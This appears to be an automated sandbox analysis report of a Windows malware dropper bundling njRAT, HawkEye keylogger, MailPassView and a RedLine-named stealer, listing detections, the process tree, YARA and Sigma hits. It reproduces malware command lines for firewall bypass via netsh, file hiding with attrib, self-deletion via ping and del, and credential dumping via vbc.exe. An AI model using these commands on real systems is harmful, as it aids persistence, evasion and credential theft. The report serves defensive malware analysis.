Loading ...

Play interactive tourEdit tour

Windows Analysis Report Hpdyv8oO3j.exe

Overview

General Information

Sample Name:Hpdyv8oO3j.exe
Analysis ID:524274
MD5:dffaf08a25150b38c19210c180862aeb
SHA1:a28b135b64a08d5ed30621aac5c3e955d4d090fb
SHA256:8fdbfbf55033187c6a4d3cd7d42394cd56cbd3b5a9dc905e72aef2886172be36
Tags:exenjratRAT
Infos:

Most interesting Screenshot:

Detection

HawkEye MailPassView Njrat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected MailPassView
Yara detected HawkEye Keylogger
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Njrat
Antivirus / Scanner detection for submitted sample
Detected HawkEye Rat
Multi AV Scanner detection for dropped file
Creates multiple autostart registry keys
Uses netsh to modify the Windows network and firewall settings
Drops PE files to the startup folder
Uses cmd line tools excessively to alter registry or file data
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
.NET source code contains potential unpacker
Creates files with lurking names (e.g. Crack.exe)
Injects a PE file into a foreign processes
Creates autostart registry keys with suspicious names
Drops executables to the windows directory (C:\Windows) and starts them
Tries to harvest and steal browser information (history, passwords, etc)
Sample uses process hollowing technique
Installs a global keyboard hook
Writes to foreign memory regions
.NET source code references suspicious native API functions
Contains functionality to log keystrokes (.Net Source)
Changes the view of files in windows explorer (hidden files and folders)
Yara detected WebBrowserPassView password recovery tool
.NET source code contains very large strings
Machine Learning detection for dropped file
Modifies the windows firewall
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Creates a start menu entry (Start Menu\Programs\Startup)
Sigma detected: Netsh Port or Application Allowed
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Creates files inside the system directory
May infect USB drives
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to detect virtual machines (SLDT)
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Social media urls found in memory data
Uses taskkill to terminate processes
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to query network adapater information
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Hpdyv8oO3j.exe (PID: 6436 cmdline: "C:\Users\user\Desktop\Hpdyv8oO3j.exe" MD5: DFFAF08A25150B38C19210C180862AEB)
    • Keylogger.exe (PID: 4492 cmdline: "C:\Users\user\AppData\Local\Temp\Keylogger.exe" MD5: C4E4A84909D8FF8DD222B8252365985D)
      • Windows Update.exe (PID: 5624 cmdline: "C:\Users\user\AppData\Roaming\Windows Update.exe" MD5: C4E4A84909D8FF8DD222B8252365985D)
        • dw20.exe (PID: 4332 cmdline: dw20.exe -x -s 2528 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
        • vbc.exe (PID: 6444 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt" MD5: C63ED21D5706A527419C9FBD730FFB2E)
        • vbc.exe (PID: 1364 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt" MD5: C63ED21D5706A527419C9FBD730FFB2E)
        • vbc.exe (PID: 1980 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt" /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt" MD5: C63ED21D5706A527419C9FBD730FFB2E)
    • hhzclipper.exe (PID: 1244 cmdline: "C:\Users\user\AppData\Local\Temp\hhzclipper.exe" MD5: FC07BE5E90A1FFA22B22D3BC58A43E58)
    • RedLine.MainPanel-cracked.exe (PID: 4140 cmdline: "C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exe" MD5: 098F7F40BACA320377ECA83FBF87F534)
      • RedLine.exe (PID: 4236 cmdline: "C:\Users\user\AppData\Roaming\RedLine.exe" MD5: 098F7F40BACA320377ECA83FBF87F534)
        • netsh.exe (PID: 7096 cmdline: netsh firewall add allowedprogram "C:\Users\user\AppData\Roaming\RedLine.exe" "RedLine.exe" ENABLE MD5: 98CC37BBF363A38834253E22C80A8F32)
          • conhost.exe (PID: 6480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RedLine.MainPanel-cracked.exe (PID: 7032 cmdline: "C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exe" MD5: 098F7F40BACA320377ECA83FBF87F534)
    • cmd.exe (PID: 3348 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\HOST.bat" " MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ViRuS.exe (PID: 2988 cmdline: "C:\Users\user\AppData\Local\Temp\ViRuS.exe" MD5: D0F09063EA6922ACBFC734145FA48203)
      • attrib.exe (PID: 5332 cmdline: C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\system32\user32dll.exe MD5: A5540E9F87D4CB083BDF8269DEC1CFF9)
        • conhost.exe (PID: 5308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • attrib.exe (PID: 7160 cmdline: C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk MD5: A5540E9F87D4CB083BDF8269DEC1CFF9)
        • conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • taskkill.exe (PID: 7116 cmdline: taskkill /f /im "ViRuS.exe" MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
        • conhost.exe (PID: 7120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • user32dll.exe (PID: 7128 cmdline: "C:\Windows\SysWOW64\user32dll.exe" MD5: D0F09063EA6922ACBFC734145FA48203)
    • taskkill.exe (PID: 7156 cmdline: taskkill /f /im "user32dll.exe" MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
      • conhost.exe (PID: 7080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • WerFault.exe (PID: 1008 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7156 -s 176 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • RedLine.exe (PID: 6688 cmdline: "C:\Users\user\AppData\Roaming\RedLine.exe" .. MD5: 098F7F40BACA320377ECA83FBF87F534)
  • WindowsUpdate.exe (PID: 6300 cmdline: "C:\Users\user\AppData\Roaming\WindowsUpdate.exe" MD5: C4E4A84909D8FF8DD222B8252365985D)
    • Windows Update.exe (PID: 5248 cmdline: "C:\Users\user\AppData\Roaming\Windows Update.exe" MD5: C4E4A84909D8FF8DD222B8252365985D)
      • dw20.exe (PID: 7048 cmdline: dw20.exe -x -s 2472 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
      • vbc.exe (PID: 4964 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt" MD5: C63ED21D5706A527419C9FBD730FFB2E)
      • vbc.exe (PID: 7156 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt" MD5: C63ED21D5706A527419C9FBD730FFB2E)
  • RedLine.exe (PID: 4864 cmdline: "C:\Users\user\AppData\Roaming\RedLine.exe" .. MD5: 098F7F40BACA320377ECA83FBF87F534)
  • WindowsUpdate.exe (PID: 4456 cmdline: "C:\Users\user\AppData\Roaming\WindowsUpdate.exe" MD5: C4E4A84909D8FF8DD222B8252365985D)
  • RedLine.exe (PID: 3408 cmdline: "C:\Users\user\AppData\Roaming\RedLine.exe" .. MD5: 098F7F40BACA320377ECA83FBF87F534)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\Keylogger.exeRAT_HawkEyeDetects HawkEye RATKevin Breen <kevin@techanarchy.net>
  • 0x7b809:$key: HawkEyeKeylogger
  • 0x7db3f:$salt: 099u787978786
  • 0x7bec6:$string1: HawkEye_Keylogger
  • 0x7cd19:$string1: HawkEye_Keylogger
  • 0x7da9f:$string1: HawkEye_Keylogger
  • 0x7c2af:$string2: holdermail.txt
  • 0x7c2cf:$string2: holdermail.txt
  • 0x7c1f1:$string3: wallet.dat
  • 0x7c209:$string3: wallet.dat
  • 0x7c21f:$string3: wallet.dat
  • 0x7d663:$string4: Keylog Records
  • 0x7d97b:$string4: Keylog Records
  • 0x7db97:$string5: do not script -->
  • 0x7b7f1:$string6: \pidloc.txt
  • 0x7b87f:$string7: BSPLIT
  • 0x7b88f:$string7: BSPLIT
C:\Users\user\AppData\Local\Temp\Keylogger.exeHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
  • 0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
C:\Users\user\AppData\Local\Temp\Keylogger.exeJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
    C:\Users\user\AppData\Local\Temp\Keylogger.exeJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
      C:\Users\user\AppData\Local\Temp\Keylogger.exeJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
        Click to see the 13 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000011.00000002.401046205.000000000384C000.00000004.00000001.sdmpJoeSecurity_HawkEyeYara detected HawkEye KeyloggerJoe Security
          0000001C.00000000.394707935.0000000000400000.00000040.00000001.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
            00000019.00000002.567099655.0000000000400000.00000040.00000001.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
              0000002A.00000002.490818765.0000000002EA1000.00000004.00000001.sdmpJoeSecurity_NjratYara detected NjratJoe Security
                0000002A.00000002.490818765.0000000002EA1000.00000004.00000001.sdmpnjrat1Identify njRatBrian Wallace @botnet_hunter
                • 0x1e963:$a1: netsh firewall add allowedprogram
                • 0x341bb:$a1: netsh firewall add allowedprogram
                • 0x3c1d3:$a1: netsh firewall add allowedprogram
                • 0x1e933:$a2: SEE_MASK_NOZONECHECKS
                • 0x3418b:$a2: SEE_MASK_NOZONECHECKS
                • 0x3c1a3:$a2: SEE_MASK_NOZONECHECKS
                • 0x1eb53:$b1: [TAP]
                • 0x343ab:$b1: [TAP]
                • 0x3c3c3:$b1: [TAP]
                • 0x1ea4f:$c3: cmd.exe /c ping
                • 0x342a7:$c3: cmd.exe /c ping
                • 0x3c2bf:$c3: cmd.exe /c ping
                Click to see the 161 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                17.2.Windows Update.exe.350b42c.5.raw.unpackHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
                • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
                17.2.Windows Update.exe.7f20000.9.raw.unpackHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
                • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
                4.2.RedLine.MainPanel-cracked.exe.2ad9310.4.raw.unpackJoeSecurity_NjratYara detected NjratJoe Security
                  4.2.RedLine.MainPanel-cracked.exe.2ad9310.4.raw.unpacknjrat1Identify njRatBrian Wallace @botnet_hunter
                  • 0x67d3:$a1: netsh firewall add allowedprogram
                  • 0x1c02b:$a1: netsh firewall add allowedprogram
                  • 0x24043:$a1: netsh firewall add allowedprogram
                  • 0x67a3:$a2: SEE_MASK_NOZONECHECKS
                  • 0x1bffb:$a2: SEE_MASK_NOZONECHECKS
                  • 0x24013:$a2: SEE_MASK_NOZONECHECKS
                  • 0x69c3:$b1: [TAP]
                  • 0x1c21b:$b1: [TAP]
                  • 0x24233:$b1: [TAP]
                  • 0x68bf:$c3: cmd.exe /c ping
                  • 0x1c117:$c3: cmd.exe /c ping
                  • 0x2412f:$c3: cmd.exe /c ping
                  4.2.RedLine.MainPanel-cracked.exe.2ad9310.4.raw.unpackNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
                  • 0x67a3:$reg: SEE_MASK_NOZONECHECKS
                  • 0x1bffb:$reg: SEE_MASK_NOZONECHECKS
                  • 0x24013:$reg: SEE_MASK_NOZONECHECKS
                  • 0x64a4:$msg: Execute ERROR
                  • 0x653e:$msg: Execute ERROR
                  • 0x1bcfc:$msg: Execute ERROR
                  • 0x1bd96:$msg: Execute ERROR
                  • 0x23d14:$msg: Execute ERROR
                  • 0x23dae:$msg: Execute ERROR
                  • 0x68bf:$ping: cmd.exe /c ping 0 -n 2 & del
                  • 0x1c117:$ping: cmd.exe /c ping 0 -n 2 & del
                  • 0x2412f:$ping: cmd.exe /c ping 0 -n 2 & del
                  Click to see the 253 entries

                  Sigma Overview

                  System Summary:

                  barindex
                  Sigma detected: Netsh Port or Application AllowedShow sources
                  Source: Process startedAuthor: Markus Neis, Sander Wiebing: Data: Command: netsh firewall add allowedprogram "C:\Users\user\AppData\Roaming\RedLine.exe" "RedLine.exe" ENABLE, CommandLine: netsh firewall add allowedprogram "C:\Users\user\AppData\Roaming\RedLine.exe" "RedLine.exe" ENABLE, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\RedLine.exe" , ParentImage: C:\Users\user\AppData\Roaming\RedLine.exe, ParentProcessId: 4236, ProcessCommandLine: netsh firewall add allowedprogram "C:\Users\user\AppData\Roaming\RedLine.exe" "RedLine.exe" ENABLE, ProcessId: 7096
                  Sigma detected: Hiding Files with Attrib.exeShow sources
                  Source: Process startedAuthor: Sami Ruohonen: Data: Command: C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\system32\user32dll.exe, CommandLine: C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\system32\user32dll.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\attrib.exe, NewProcessName: C:\Windows\SysWOW64\attrib.exe, OriginalFileName: C:\Windows\SysWOW64\attrib.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\ViRuS.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\ViRuS.exe, ParentProcessId: 2988, ProcessCommandLine: C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\system32\user32dll.exe, ProcessId: 5332

                  Jbx Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Antivirus detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeAvira: detection malicious, Label: TR/Agent.32768.2190
                  Source: C:\Windows\SysWOW64\user32dll.exeAvira: detection malicious, Label: TR/Agent.32768.2190
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeAvira: detection malicious, Label: BDS/Bladabindi.ajooc
                  Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeAvira: detection malicious, Label: TR/AD.MExecute.lzrac
                  Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeAvira: detection malicious, Label: SPR/Tool.MailPassView.473
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\61bc7bd88d10e97264127fe545415b17.exeAvira: detection malicious, Label: BDS/Bladabindi.ajooc
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeAvira: detection malicious, Label: TR/AD.MExecute.lzrac
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeAvira: detection malicious, Label: SPR/Tool.MailPassView.473
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeAvira: detection malicious, Label: TR/AD.MExecute.lzrac
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeAvira: detection malicious, Label: SPR/Tool.MailPassView.473
                  Source: C:\Users\user\AppData\Local\Temp\hhzclipper.exeAvira: detection malicious, Label: HEUR/AGEN.1134703
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeAvira: detection malicious, Label: BDS/Bladabindi.ajooc
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: Hpdyv8oO3j.exeMetadefender: Detection: 74%Perma Link
                  Source: Hpdyv8oO3j.exeReversingLabs: Detection: 100%
                  Yara detected NjratShow sources
                  Source: Yara matchFile source: 4.2.RedLine.MainPanel-cracked.exe.2ad9310.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.RedLine.MainPanel-cracked.exe.2886bc0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.RedLine.MainPanel-cracked.exe.24b0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RedLine.MainPanel-cracked.exe.2630000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RedLine.MainPanel-cracked.exe.2ae6bc0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.RedLine.exe.2a99190.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.RedLine.exe.2a99190.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.RedLine.exe.2aa6b58.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.RedLine.MainPanel-cracked.exe.24b0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RedLine.MainPanel-cracked.exe.2ad9310.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.RedLine.MainPanel-cracked.exe.2879310.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.RedLine.MainPanel-cracked.exe.2886cd8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.RedLine.MainPanel-cracked.exe.2879310.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.RedLine.exe.2700000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RedLine.MainPanel-cracked.exe.2630000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RedLine.MainPanel-cracked.exe.2ae6cd8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.RedLine.exe.2aa6a40.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.RedLine.exe.2700000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000002A.00000002.490818765.0000000002EA1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000022.00000002.460848822.0000000002831000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.344112668.0000000002630000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.569953826.0000000002A81000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.344202284.0000000002AC1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000002A.00000002.490487625.0000000002AD0000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000022.00000002.460388443.00000000008F0000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.339955429.0000000002861000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.339619983.00000000024B0000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.421069475.0000000002C51000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.420830260.0000000002620000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.569803952.0000000002700000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RedLine.MainPanel-cracked.exe PID: 4140, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RedLine.MainPanel-cracked.exe PID: 7032, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RedLine.exe PID: 4236, type: MEMORYSTR
                  Antivirus / Scanner detection for submitted sampleShow sources
                  Source: Hpdyv8oO3j.exeAvira: detected
                  Multi AV Scanner detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeReversingLabs: Detection: 89%
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeMetadefender: Detection: 82%Perma Link
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeReversingLabs: Detection: 92%
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\61bc7bd88d10e97264127fe545415b17.exeReversingLabs: Detection: 89%
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeReversingLabs: Detection: 89%
                  Source: C:\Windows\SysWOW64\user32dll.exeMetadefender: Detection: 82%Perma Link
                  Source: C:\Windows\SysWOW64\user32dll.exeReversingLabs: Detection: 92%
                  Machine Learning detection for sampleShow sources
                  Source: Hpdyv8oO3j.exeJoe Sandbox ML: detected
                  Machine Learning detection for dropped fileShow sources
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeJoe Sandbox ML: detected
                  Source: C:\Windows\SysWOW64\user32dll.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\61bc7bd88d10e97264127fe545415b17.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\hhzclipper.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeJoe Sandbox ML: detected
                  Source: 2.0.Keylogger.exe.760000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                  Source: 2.0.Keylogger.exe.760000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                  Source: 19.0.user32dll.exe.400000.0.unpackAvira: Label: TR/Agent.32768.2190
                  Source: 17.0.Windows Update.exe.d40000.8.unpackAvira: Label: TR/AD.MExecute.lzrac
                  Source: 17.0.Windows Update.exe.d40000.8.unpackAvira: Label: SPR/Tool.MailPassView.473
                  Source: 19.2.user32dll.exe.400000.0.unpackAvira: Label: TR/Agent.32768.2190
                  Source: 17.2.Windows Update.exe.d40000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                  Source: 17.2.Windows Update.exe.d40000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                  Source: 16.2.RedLine.exe.580000.0.unpackAvira: Label: BDS/Bladabindi.ajooc
                  Source: 17.0.Windows Update.exe.d40000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                  Source: 17.0.Windows Update.exe.d40000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                  Source: 5.0.RedLine.MainPanel-cracked.exe.340000.0.unpackAvira: Label: BDS/Bladabindi.ajooc
                  Source: 0.3.Hpdyv8oO3j.exe.708218.1.unpackAvira: Label: TR/Agent.32768.2190
                  Source: 4.0.RedLine.MainPanel-cracked.exe.550000.0.unpackAvira: Label: BDS/Bladabindi.ajooc
                  Source: 17.0.Windows Update.exe.d40000.12.unpackAvira: Label: TR/AD.MExecute.lzrac
                  Source: 17.0.Windows Update.exe.d40000.12.unpackAvira: Label: SPR/Tool.MailPassView.473
                  Source: 4.2.RedLine.MainPanel-cracked.exe.550000.0.unpackAvira: Label: BDS/Bladabindi.ajooc
                  Source: 2.2.Keylogger.exe.760000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
                  Source: 2.2.Keylogger.exe.760000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
                  Source: 5.2.RedLine.MainPanel-cracked.exe.340000.0.unpackAvira: Label: BDS/Bladabindi.ajooc
                  Source: 17.0.Windows Update.exe.d40000.4.unpackAvira: Label: TR/AD.MExecute.lzrac
                  Source: 17.0.Windows Update.exe.d40000.4.unpackAvira: Label: SPR/Tool.MailPassView.473
                  Source: 16.0.RedLine.exe.580000.0.unpackAvira: Label: BDS/Bladabindi.ajooc
                  Source: 8.2.ViRuS.exe.400000.0.unpackAvira: Label: TR/Agent.32768.2190
                  Source: 8.0.ViRuS.exe.400000.0.unpackAvira: Label: TR/Agent.32768.2190
                  Source: Hpdyv8oO3j.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                  Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 00000011.00000002.397838625.0000000002F57000.00000004.00000040.sdmp
                  Source: Binary string: C:\Windows\mscorlib.pdb source: Windows Update.exe, 00000011.00000002.405064148.000000000838A000.00000004.00000010.sdmp
                  Source: Binary string: .pdb8 source: Windows Update.exe, 00000011.00000002.405064148.000000000838A000.00000004.00000010.sdmp
                  Source: Binary string: mscorlib.pdbH4s source: Windows Update.exe, 00000011.00000002.405064148.000000000838A000.00000004.00000010.sdmp
                  Source: Binary string: mscorlib.pdb source: Windows Update.exe, 00000011.00000002.397838625.0000000002F57000.00000004.00000040.sdmp
                  Source: Binary string: symbols\dll\mscorlib.pdb source: Windows Update.exe, 00000011.00000002.405064148.000000000838A000.00000004.00000010.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Roaming\Windows Update.PDBE source: Windows Update.exe, 00000011.00000002.404185049.0000000006DF4000.00000004.00000001.sdmp
                  Source: Binary string: \??\C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 00000011.00000002.404011011.0000000006D70000.00000004.00000001.sdmp
                  Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: Keylogger.exe, Windows Update.exe
                  Source: Binary string: C:\Windows\mscorlib.pdbn source: Windows Update.exe, 00000011.00000002.397838625.0000000002F57000.00000004.00000040.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: Windows Update.exe, 00000011.00000002.404185049.0000000006DF4000.00000004.00000001.sdmp
                  Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: Windows Update.exe, 00000011.00000002.397838625.0000000002F57000.00000004.00000040.sdmp
                  Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: Keylogger.exe, Windows Update.exe, vbc.exe, 00000019.00000002.567099655.0000000000400000.00000040.00000001.sdmp
                  Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 00000011.00000002.405064148.000000000838A000.00000004.00000010.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbC source: Windows Update.exe, 00000011.00000002.404126730.0000000006DD4000.00000004.00000001.sdmp
                  Source: Binary string: C:\Windows\dll\mscorlib.pdb source: Windows Update.exe, 00000011.00000002.397838625.0000000002F57000.00000004.00000040.sdmp
                  Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: Keylogger.exe, Windows Update.exe, vbc.exe
                  Source: Binary string: mscorlib.pdbndows Update.exe source: Windows Update.exe, 00000011.00000002.397838625.0000000002F57000.00000004.00000040.sdmp
